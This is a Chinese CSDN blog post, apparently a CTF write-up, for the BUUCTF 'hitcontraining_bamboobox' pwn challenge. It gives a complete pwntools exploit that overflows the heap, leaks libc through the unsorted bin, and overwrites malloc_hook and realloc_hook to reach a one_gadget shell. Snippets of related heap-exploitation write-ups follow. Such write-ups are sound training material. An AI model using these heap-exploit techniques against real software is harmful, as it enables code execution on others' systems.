hitcontraining_bamboobox

最新推荐文章于 2023-12-02 01:08:35 发布
最新推荐文章于 2023-12-02 01:08:35 发布
阅读量114 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61948538/article/details/128863821
版权
文章详细描述了一种针对堆溢出漏洞的利用方法,涉及了amd64架构下的Linux环境。首先通过创建和删除堆块来泄露main_arena的地址,然后利用malloc_hook进行攻击,通过精心构造的payload引导执行流经reallocHook到特定gadget,以实现栈对齐和控制程序流程。整个过程展示了复杂的漏洞利用技术和链式调用的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这题漏洞就一个堆溢出,libc是buu常用的那个2.23,所以打法很多。

以上是漏洞出现的函数,同时它还有show功能

from LibcSearcher import *
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/bamboobox' )
#p=remote("node4.buuoj.cn",27153)
p=process('/home/hacker/Desktop/bamboobox' )
def show():
    p.sendlineafter("Your choice:",str(1))

def add(number,content):
    p.sendlineafter("Your choice:",str(2))
    p.sendlineafter("Please enter the length of item name:",str(number))
    p.sendlineafter("Please enter the name of item:",content)

def write(index,number,content):
    p.sendlineafter('Your choice:',str(3))
    p.sendlineafter("Please enter the index of item:",str(index))
    p.sendlineafter("Please enter the length of item name:",str(number))
    p.sendlineafter("Please enter the new name of the item:",content)
def delete(index):
    p.sendlineafter("Your choice:",str(4))
    p.sendlineafter('Please enter the index of item:',str(index))

add(0x10,'a')#0
add(0x10,'a')#1
add(0x70,'a')#2
add(0x10,'b')#3
add(0x60,'c')#4
write(0,100,'\x00'*(0x10+8)+p64(0xa1))
delete(1)
add(0x10,'a')#4
show()

p.recvuntil('2 : ')
main_arena = u64(p.recv(6).ljust(8,'\x00')) - 88
print("main_arena=",hex(main_arena))
malloc_hook_offset = 0x3c4b10
main_arena_offset = 0x3c4b20
libc = main_arena-main_arena_offset
malloc_hook = libc + malloc_hook_offset

build = malloc_hook-0x23
realloc = 0x84710 + libc
realloc_hook = libc + 0x1f7f0

print("realloc_hook:",hex(realloc))
print("build_addr:",hex(build))
delete(4)
write(3,100,'a'*0x10+p64(0)+p64(0x71)+p64(build))
add(0x60,'a')
add(0x60,'a')#5
gadget = libc + 0x4527a
print("gadget_addr:",hex(gadget))
write(5,100,'a'*11 + p64(gadget) + p64(realloc+6))

p.sendlineafter("Your choice:",str(2))
p.sendlineafter("Please enter the length of item name:",str(0x10))

p.interactive()

我的leak方法是先用两个堆块伪造一个大堆块将其free掉放入unsortedbin中,然后将两个中的第一个堆块add回来,这个时候就可以发现另一个堆块同时在allocated和unsortedbins中,直接show,就可以导出main_arena的地址。

然后就是malloc_hook攻击,构造好之后,会发现一个问题,执行不了所有的gadget,因为栈没有对齐,这个时候,我们就需要思考realloc_hook和malloc_hook的联用。

执行手法是是在malloc_hook中放入realloc+?的地址,再在realloc_hook中放入gadget,这样就能形成malloc->malloc_hook->realloc->realloc_hook->gadget,至于为什么要这样,是因为realloc的地方有很多push操作可以帮助栈对齐,?地址怎么出来,最好的方法就是一个一个试,如果手动调试,压栈的时候会出现变化,但是一个一个试之前,需要保证调试能进入gadget。

_On3_
关注
[BUUCTF]-PWN:hitcontraining_heapcreator解析(off by one)
2301_79326813的博客
01-17 724
又是一道堆题,先看一下保护Partial RELRO说明got表可被修改,而且还没开pie,直接看ida这里就不过多解释了,把比较重要的说一下。首先是这个edit,它限制了填充字节,只能比我们申请的大小多1个字节。还有创建堆块的函数,他在创建我们申请的堆块前还申请了一个大小为0x10的堆块。在动态调试中可以发现,这个堆块还存储了与填充字节数有关的字节数,而且还和heaparray一样存储了指向与他一同创建的堆块的指针。
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 821
格式化字符串
【unlink】hitcontraining_bamboobox
huzai9527的博客
05-13 218
【unlink】hitcontraining_bamboobox 1. ida分析 有存放全局指针的数组,存放格式为itemlist[0]为size,itemlist[1]为指向item的指针 change时没有检测输入长度,存在堆溢出 2.思路 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位 free chunk1,unlink后itemlist[1] ->itemlist[-2] 再次编辑chunk0,即编辑item
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 460
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
BUUCTF hitcontraining_magicheap[堆]
weixin_45441024的博客
12-28 436
BUUCTF hitcontraining_magicheap[堆](Unsorted bin attack) 我们先来学习一下什么是Unsorted binattack 用ctfwiki里面的例子来进行解释: Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 481
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 1002
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink)
mcmuyanga的博客
03-02 1508
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
HITCON training lab 11——bamboobox
04-23 633
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
关于wiki的Unlink攻击理解--附例题BUUCTF-hitcontraining_bamboobox1
qq_30528603的博客
12-02 386
我们知道P的fd和bk都是我们自己构造的。我们假设程序通过溢出或者UAF修改了chunk2的fd和bk,我这里让chunk2的fd指向free的got表地址,bk指向一段内存中我们可读可写可执行的地方(也就是能布置shellcode的)。这样构造的目的是改写下一个chunk的标志位,触发fake_chunk能够进行unlink操作,并且在第二个chunk的数据域构造一个伪chunk。其实就是所谓的断链操作,让P的前一个chunk指向后一个chunk,然后P的后一个chunk指回P的前一个chunk。
hitcontraining_bamboobox的wp
wuyvle的博客
03-16 1198
是个堆题 add函数 change函数 没有判断大小可以进行unlink操作 伪造一个空闲 chunk。 通过 unlink 把 chunk 移到存储 chunk 指针的内存处。 覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。 覆盖 atoi 的 got 表为 system 函数地址。 给出参数 ‘sh’,调用 atoi 函数拿 shell。 add(0x40,b'a' * 8) add(0x80,b'b' * 8) add(0x80,b'c' * 8) ptr = 0x6020
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1174
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
BUUCTF pwn wp 71 - 75
fa1c4的blog
11-16 636
ciscn_2019_final_3 picoctf_2018_shellcode jarvisoj_level5 npuctf_2020_easyheap hitcontraining_bamboobox
pwn入门小技巧
qq_36918532的博客
05-24 3142
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8683
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
嵌入式八股文面试题库资料知识宝典-华为的面试试题.zip
04-27
嵌入式八股文面试题库资料知识宝典-华为的面试试题.zip
训练导控系统设计.pdf
最新发布
04-27
训练导控系统设计.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值